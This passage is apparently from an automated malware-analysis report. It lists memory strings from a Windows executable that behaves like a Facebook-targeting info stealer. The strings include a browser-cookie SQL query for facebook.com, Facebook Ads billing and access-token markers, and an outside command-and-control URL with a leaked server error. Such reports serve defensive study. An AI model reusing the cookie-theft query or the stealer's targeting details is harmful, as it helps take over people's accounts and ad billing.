38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467253250.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292504672.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446086302.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292562402.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405892826.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.382189372.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.469104643.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: @www.facebook.comngt+ equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AcceptRefererAccept-Languageen-US,en;q=0.9Content-TypeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36User-AgentContent-LengthCookiehttps://www.facebook.com/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settingswww.facebook.comHostkeep-aliveConnectioncorsSec-Fetch-Modehttps://www.facebook.comOrigin1280Viewport-WidthBillingAMNexusRootQueryX-FB-Friendly-NameX-FB-LSDapplication/x-www-form-urlencodedsame-originSec-Fetch-Sitehttps://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.443681922.00000000032C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debug31pUE67nBV4C9nwmqp/3sI1pvW50kQJjBIGAu6J3pG92wchuI0dln+nx2AlUF0dYMVy+mOsvwaHEna7Ny5tJ7Q==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-Info equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.429617490.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.437973389.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debug31pUE67nBV4C9nwmqp/3sI1pvW50kQJjBIGAu6J3pG92wchuI0dln+nx2AlUF0dYMVy+mOsvwaHEna7Ny5tJ7Q==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:28 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.423035507.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugIqKxJ0nq+U38w433C8SugNr1iODFI5HU5N456LFHBtxB6R1pyojMg+6RvDS6oONnda+yVC0sYtnDLvy9sD3aew==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:25 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530954384.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugSPy7pi4V1GReK60/XyYXQAY/EYU2d9HatMiDOcUWAlBu9i9ErTn3gS48Vf6gXwIxhO5ez+dOFHsqZLYPSdaNOQ==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 14:00:15 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Controlr%2 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530675690.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugSPy7pi4V1GReK60/XyYXQAY/EYU2d9HatMiDOcUWAlBu9i9ErTn3gS48Vf6gXwIxhO5ez+dOFHsqZLYPSdaNOQ==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 14:00:15 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Controlr%2p% equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292557130.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292551749.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debugfq/uX1fI+8wnFpghTp1o27/tvPsvMl9SuTt7mhWvMLOKpiDQdR5EpUpNHCTKu8edASCBCBCVLCubpJZvl329LQ==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:58:24 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.470857208.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugmobkIDXzDXWuCoYj+MGZqVN+/2wIuixCcE4a7dujHooWVQwu2M/eqs34tZd8TUDV9IgEV0WiPgrzwupj9camrg==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:47 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Controlr%2p% equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.455436894.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.473095096.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446620460.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.466037722.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446436347.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414395526.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugzmLcqRC9QViIit+ln0ZiOFQoBslTWw0G+d+ysNt7UUiIkVTmBKMHcVZyHiGGXV+EitPogRi+5yxsAZzzRY8Qew==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:18 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408808757.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugzmLcqRC9QViIit+ln0ZiOFQoBslTWw0G+d+ysNt7UUiIkVTmBKMHcVZyHiGGXV+EitPogRi+5yxsAZzzRY8Qew==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:18 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control&,t equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488720987.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400X-FB-Debug9skqJ1JFSpjkJ/zsqE8GOPq+sptKl4fXoq63U/BCKPasZ+Rpm+FBVuq1Aq/8JNO5OvOVpl+EoqwCQZ3r+bRweg==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:49 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.477175888.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400X-FB-Debug9skqJ1JFSpjkJ/zsqE8GOPq+sptKl4fXoq63U/BCKPasZ+Rpm+FBVuq1Aq/8JNO5OvOVpl+EoqwCQZ3r+bRweg==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:49 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control;,t equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.517348522.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.511073198.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.510209199.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.526750231.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.515757312.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\port-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradehunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveFri, 07 Oct 2022 13:59:47 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Controlr%2 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408808757.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292557130.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.455436894.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.473095096.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446620460.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.487732693.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.466037722.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446436347.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414395526.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292551749.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.489247468.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.526088410.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.429617490.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.443681922.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.550122757.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.527786558.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.437973389.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.423035507.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: NU@Ohttps://www.facebook.comSoftware\zsmjrry\zsmjrrySoftware\zsmjrry\zsmjrry1Software\zsmjrryhttp://103.136.42.153/seemorebty/z9Yzbx5JbVSUWmTGhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36https://graph.facebook.com/&_index=5&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&method=get&pretty=0&suppress_http_code=1/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settings/profile.php?sk=friends/ads/manager/accounts?_fb_noscript=1all_accounts_table_account_id_cellhref="/pages/?category=your_pages&ref=bookmarks/bookmarks/pages?ref_type=logout_geartab_count:/profile.php?id=adsApiVersion:"locale:"sessionId:"access_token:"?act=FDroid1Software\ffdroider equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: WVCKgjmJdmAm^jnakj`aFihc`oNby\|vUikgjmsgk}lwbhehce=RceKhici[>>>usgYKnk{exckzSGx\|w{beYQbjJkhdhR.https://www.facebook.comtestEDGEchrome%xC:\IiflEci~l\|vQRoiago equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414395526.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408808757.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \$star-mini.c10r.facebook.comwww.facebook.com%,t equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292769385.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.320018633.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.569854907.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.336031175.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.558527678.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.487732693.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.489247468.00000000033E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.470857208.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%